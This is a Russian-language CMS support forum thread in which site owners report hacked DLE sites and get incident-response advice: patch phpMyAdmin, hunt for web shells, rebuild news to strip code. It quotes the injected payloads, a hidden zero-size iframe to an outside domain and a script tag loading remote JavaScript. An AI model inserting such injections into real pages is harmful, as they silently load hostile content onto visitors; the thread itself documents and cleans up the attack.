Взломали сайт

[hrompic 4]

Друзья! Сегодня утром заметил что на сайт в main.tpl стоит код <iframe src="http://4sos.ru" width="0" height="0" frameborder="0"></iframe> .Это мелочи ,код убрал но когда приступил к редактированию новостей на сайте то с ужасом увидел что во всех новостях(в окнах полной новости ) стоит этот код !!! Так как в БД около 90000 новостей и во всех новостях был этот код (причем через замену код не убирался) пришлось восстановить более ранний дамп БД.

Такой вопрос:

1.как такое могло произойти?

2.как этого избежать в дальнейшем?

Версия 8.5 ,сайт ru-video.net

Заранее благодарен!

[celsoft 5 993]

hrompic,

Получен прямой доступ к базе данных, потому как имея даже полный доступ к админпанели DLE, этот код в новость не добавить, он его вырезает при добавлении. Если на вашем сервере стояли все вышедшие ранее патчи безопасности для скрипта, и нет сторонних скриптов, то ваш сервер скорее всего подвергся атаке со стороны phpMyAdmin, недавно была обнаружена серьезная уязвимость в нем, позволяющая залить шелл на сервер и получить доступ к БД. Обновите phpMyAdmin до актуальной версии, лучше сначала предварительно удалить его с севрера, смените все пароли, проверьте сайт на наличие шелла, это может сделать встроенный антивирус в админпанели DLE

[hrompic 4]

hrompic,

Получен прямой доступ к базе данных, потому как имея даже полный доступ к админпанели DLE, этот код в новость не добавить, он его вырезает при добавлении. Если на вашем сервере стояли все вышедшие ранее патчи безопасности для скрипта, и нет сторонних скриптов, то ваш сервер скорее всего подвергся атаке со стороны phpMyAdmin, недавно была обнаружена серьезная уязвимость в нем, позволяющая залить шелл на сервер и получить доступ к БД. Обновите phpMyAdmin до актуальной версии, лучше сначала предварительно удалить его с севрера, смените все пароли, проверьте сайт на наличие шелла, это может сделать встроенный антивирус в админпанели DLE

А какая последняя версия phpMyAdmin и как её обновить?

[celsoft 5 993]

hrompic,

phpMyAdmin 3.3.8 http://www.phpmyadmin.net/home_page/index.php инструкция по обновлению там же.

[hrompic 4]

hrompic,

phpMyAdmin 3.3.8 http://www.phpmyadmin.net/home_page/index.php инструкция по обновлению там же.

У меня стоит phpMyAdmin - 2.11.8.1deb5+lenny4 - эта версия уязвимая?

[Sarvan 35]

До 2.11.10 он дыряв и есть эксплойт.

[celsoft 5 993]

У меня стоит phpMyAdmin - 2.11.8.1deb5+lenny4 - эта версия уязвимая?

да и еще как, сохраните конфигурационный файл, и удалите другие файлы из этой папке, потом залейте новую версию и восстановите конфигурационный файл

До 2.11.10 он дыряв и есть эксплойт.

для 3 линейки там уже тоже порядочно нашли.

Кстати измените пути для доступа к phpMyAdmin на какой нибудь случайный и никому неизвестный, чтобы никто кроме вас не мог знать путь, по которому он распологается.

и с вероятностью в 99,9% у вас теперь где то шелл на сервере, его нужно найти и удалить, хотя злоумышленник его мог сам удалить, чтобы затереть следы

[WWW.ZEOS.IN 1 161]

Лично я не понимаю зачем постоянно хранить этот phpMyAdmin на сервере. Проще установить когда он нужен для каких-то операций, а потом снова удалить.

Или еще проще дать права доступа на каталог только для своего IP

причем через замену код не убирался

В базе все вот такое: <iframe src="http://4sos.ru" width="0" height="0" frameborder="0"></iframe> или в каждой новости разное?

[Sarvan 35]

и с вероятностью в 99,9% у вас теперь где то шелл на сервере, его нужно найти и удалить, хотя злоумышленник его мог сам удалить, чтобы затереть следы

Да начните с /tmp 99%, что шел *.php, a.txt там.

Изменено 21 ноября 2010 пользователем Sarvan

[hrompic 4]

Лично я не понимаю зачем постоянно хранить этот phpMyAdmin на сервере. Проще установить когда он нужен для каких-то операций, а потом снова удалить.

Или еще проще дать права доступа на каталог только для своего IP

причем через замену код не убирался

В базе все вот такое: <iframe src="http://4sos.ru" width="0" height="0" frameborder="0"></iframe> или в каждой новости разное?

Во всех новостях в окнах полной новости этот код.

[WWW.ZEOS.IN 1 161]

Ну так сделайте замену <iframe src="http://****" width="0" height="0" frameborder="0"></iframe> на пустоту.

Пишите мне в ICQ я расскажу как можно почистить базу

[hrompic 4]

Ну так сделайте замену <iframe src="http://****" width="0" height="0" frameborder="0"></iframe> на пустоту.

Пишите мне в ICQ я расскажу как можно почистить базу

На пустоту делал-не выходит....К сожалению БД уже перезалил и потерял 400 новостей...

При заливке дампа в БД через прогу Sypex Dumper Lite 1.0.8 после прошествии 5 минут выдается:

Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, hrompic@yandex.ru and inform them of the time the error occurred, and anything you might have done that may have caused the error.

и соответсвенно дамп не доливается! Какого лимита не хватает подскажите???

Изменено 21 ноября 2010 пользователем hrompic

[celsoft 5 993]

Какого лимита не хватает подскажите???

в логах скрипта пишется конкретная причина, нужно по логам смотреть.

[WWW.ZEOS.IN 1 161]

При заливке дампа в БД через прогу Sypex Dumper Lite 1.0.8 после прошествии 5 минут выдается

Зачем заливать через какую-то программу?

Прочитайте по этой ссылке: http://forum.dle-news.ru/index.php?showtopic=49371&view=findpost&p=234553

[hrompic 4]

При заливке дампа в БД через прогу Sypex Dumper Lite 1.0.8 после прошествии 5 минут выдается

Зачем заливать через какую-то программу?

Прочитайте по этой ссылке: http://forum.dle-news.ru/index.php?showtopic=49371&view=findpost&p=234553

К сожалению мне это не осилить....Блин,девять часов не могу БД залить дампером....

[WWW.ZEOS.IN 1 161]

Написали бы мне в ICQ и я давно бы помог

[hrompic 4]

Написали бы мне в ICQ и я давно бы помог

Вы знаете как дамп 700 МБ закачать в БД ?

[WWW.ZEOS.IN 1 161]

Конечно, я же даже ссылку Вам дал и там описано подробно, как это делается

[hrompic 4]

Друзья!

Огромное спасибо за советы! Шеллы удалил,БД восстановил из дампа,муадмин обновил и изменил путь - хрен теперь найдут.

Всем спасибо за участие!

[scodch 0]

Здравствуйте.

У меня возникла та же проблема.

Во всех новостях, в конце краткой и полной новости код:

<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>

Поиск и замена результатов не даёт.

Подскажите пожалуйста, как можно почистить базу от этого кода.

Сайт: hdrip.su

[celsoft 5 993]

scodch,

обновитесь до актуальной версии, там есть раздел перестроения новостей, он зачистит зловредный код.

[scodch 0]

scodch,

обновитесь до актуальной версии, там есть раздел перестроения новостей, он зачистит зловредный код.

Помогло! Большое спасибо! Код удален А можно где-то побольше узнать о разделе перестроения новостей? Хотелось бы побольше узнать что и как этот чудо раздел делает

Изменено 6 января 2011 пользователем scodch

[celsoft 5 993]

scodch,

этот раздел перестраивает новости в соответствии с настройками скрипта и требованиями безопасности скрипта. JS код добавить в новость через скрипт нельзя, это запрещено, поэтому при перестроении новостей, скрипт автоматически его зачищает.

[scodch 0]

scodch,

этот раздел перестраивает новости в соответствии с настройками скрипта и требованиями безопасности скрипта. JS код добавить в новость через скрипт нельзя, это запрещено, поэтому при перестроении новостей, скрипт автоматически его зачищает.

Понял. Очень полезная функция. Еще раз спасибо!

[abasive 41]

когда приступил к редактированию новостей на сайте то с ужасом увидел что во всех новостях(в окнах полной новости ) стоит этот код !!!

А вы не подумали может код ставили в fullstory, а не в базу

Провертье ваш шаблон а не ковырайтесь в базе данных